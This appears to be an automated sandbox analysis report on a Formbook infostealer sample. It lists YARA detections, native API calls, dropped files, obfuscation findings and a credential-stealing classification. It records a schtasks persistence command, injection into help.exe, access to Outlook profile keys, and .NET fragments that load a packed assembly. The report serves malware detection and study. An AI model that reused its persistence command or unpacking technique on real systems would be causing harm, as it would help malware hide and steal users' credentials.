          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_0138BB4E NtQuerySystemInformation,0_2_0138BB4E
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_0138BB13 NtQuerySystemInformation,0_2_0138BB13
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00419CA0 NtCreateFile,5_2_00419CA0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00419D50 NtReadFile,5_2_00419D50
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00419DD0 NtClose,5_2_00419DD0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00419E80 NtAllocateVirtualMemory,5_2_00419E80
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00419C9B NtCreateFile,5_2_00419C9B
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00419DCA NtClose,5_2_00419DCA
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00419E7B NtAllocateVirtualMemory,5_2_00419E7B
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_014C9910
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C99A0 NtCreateSection,LdrInitializeThunk,5_2_014C99A0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9840 NtDelayExecution,LdrInitializeThunk,5_2_014C9840
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_014C9860
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C98F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_014C98F0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9A50 NtCreateFile,LdrInitializeThunk,5_2_014C9A50
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_014C9A00
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9A20 NtResumeThread,LdrInitializeThunk,5_2_014C9A20
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9540 NtReadFile,LdrInitializeThunk,5_2_014C9540
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C95D0 NtClose,LdrInitializeThunk,5_2_014C95D0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9710 NtQueryInformationToken,LdrInitializeThunk,5_2_014C9710
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9780 NtMapViewOfSection,LdrInitializeThunk,5_2_014C9780
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C97A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_014C97A0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_014C9660
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_014C96E0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9950 NtQueueApcThread,5_2_014C9950
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C99D0 NtCreateProcessEx,5_2_014C99D0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014CB040 NtSuspendThread,5_2_014CB040
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9820 NtEnumerateKey,5_2_014C9820
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C98A0 NtWriteVirtualMemory,5_2_014C98A0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9B00 NtSetValueKey,5_2_014C9B00
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014CA3B0 NtGetContextThread,5_2_014CA3B0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9A10 NtQuerySection,5_2_014C9A10
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9A80 NtOpenDirectoryObject,5_2_014C9A80
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9560 NtWriteFile,5_2_014C9560
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9520 NtWaitForSingleObject,5_2_014C9520
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014CAD30 NtSetContextThread,5_2_014CAD30
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C95F0 NtQueryInformationFile,5_2_014C95F0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9760 NtOpenProcess,5_2_014C9760
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014CA770 NtOpenThread,5_2_014CA770
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9770 NtSetInformationFile,5_2_014C9770
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014CA710 NtOpenProcessToken,5_2_014CA710
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9730 NtQueryVirtualMemory,5_2_014C9730
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9FE0 NtCreateMutant,5_2_014C9FE0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9650 NtQueryValueKey,5_2_014C9650
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9670 NtQueryInformationProcess,5_2_014C9670
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C9610 NtEnumerateValueKey,5_2_014C9610
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014C96D0 NtCreateKey,5_2_014C96D0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D636C00_2_02D636C0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6DAE00_2_02D6DAE0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D60E080_2_02D60E08
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D62FC80_2_02D62FC8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D623B80_2_02D623B8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D60B000_2_02D60B00
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D613090_2_02D61309
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6401B0_2_02D6401B
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D666900_2_02D66690
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D666800_2_02D66680
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D66E500_2_02D66E50
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D66E600_2_02D66E60
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6A2680_2_02D6A268
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6CF880_2_02D6CF88
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6CBB80_2_02D6CBB8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D62F280_2_02D62F28
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D67CBB0_2_02D67CBB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D66C590_2_02D66C59
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D670480_2_02D67048
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D65C480_2_02D65C48
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D66C680_2_02D66C68
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6A8080_2_02D6A808
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6C4300_2_02D6C430
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D65C3B0_2_02D65C3B
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D670390_2_02D67039
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D671DB0_2_02D671DB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6DDF00_2_02D6DDF0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6AD900_2_02D6AD90
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6B5800_2_02D6B580
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D6E5600_2_02D6E560
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D669190_2_02D66919
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041DBAE5_2_0041DBAE
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041DD505_2_0041DD50
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00409DDA5_2_00409DDA
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00409E205_2_00409E20
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041CEF35_2_0041CEF3
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041DFA95_2_0041DFA9
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0148F9005_2_0148F900
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014A41205_2_014A4120
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_015410025_2_01541002
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_015528EC5_2_015528EC
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0149B0905_2_0149B090
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014B20A05_2_014B20A0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_015520A85_2_015520A8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_01552B285_2_01552B28
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0154DBD25_2_0154DBD2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014BEBB05_2_014BEBB0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_015522AE5_2_015522AE
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_01551D555_2_01551D55
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_01552D075_2_01552D07
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_01480D205_2_01480D20
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_015525DD5_2_015525DD
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0149D5E05_2_0149D5E0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014B25815_2_014B2581
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0154D4665_2_0154D466
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0149841F5_2_0149841F
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_01551FF15_2_01551FF1
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0154D6165_2_0154D616
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014A6E305_2_014A6E30
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_01552EF75_2_01552EF7
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: String function: 0148B150 appears 35 times
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204782995.0000000006220000.00000002.00000001.sdmpBinary or memory string: originalfilename vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204782995.0000000006220000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204568741.0000000006120000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204192717.0000000005780000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200968047.0000000002DA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinRar.dll. vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000000.186675537.0000000000A7E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameA1F.exe, vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.203689491.0000000005300000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000005.00000002.245115635.000000000170F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244167481.0000000001029000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000005.00000000.199396882.000000000097E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameA1F.exe, vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exeBinary or memory string: OriginalFilenameA1F.exe, vs pZTgBSxb0oe9deC.exe
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: pZTgBSxb0oe9deC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: pRVJhcAjvJZLI.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@7/2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_0138B59A AdjustTokenPrivileges,0_2_0138B59A
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_0138B563 AdjustTokenPrivileges,0_2_0138B563
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeFile created: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_01
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD165.tmpJump to behavior
          Source: pZTgBSxb0oe9deC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: pZTgBSxb0oe9deC.exeVirustotal: Detection: 34%
          Source: pZTgBSxb0oe9deC.exeReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeFile read: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe 'C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeProcess created: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile written: C:\Users\user\AppData\Roaming\O9541UQ2\O95logri.iniJump to behavior
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: pZTgBSxb0oe9deC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: pZTgBSxb0oe9deC.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244710088.000000000157F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pZTgBSxb0oe9deC.exe
          Source: Binary string: help.pdbGCTL source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244167481.0000000001029000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244167481.0000000001029000.00000004.00000020.sdmp
          Source: Binary string: mscorrc.pdb source: pZTgBSxb0oe9deC.exe, 00000000.00000002.203689491.0000000005300000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)Show sources
          Source: pZTgBSxb0oe9deC.exe, yy?P????c/f?gs?YxpLe.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: pRVJhcAjvJZLI.exe.0.dr, yy?P????c/f?gs?YxpLe.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 0.0.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 0.2.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 5.0.pZTgBSxb0oe9deC.exe.890000.0.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 5.2.pZTgBSxb0oe9deC.exe.890000.1.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          .NET source code contains potential unpackerShow sources
          Source: pZTgBSxb0oe9deC.exe, yy?P????c/f?gs?YxpLe.cs.Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: pRVJhcAjvJZLI.exe.0.dr, yy?P????c/f?gs?YxpLe.cs.Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
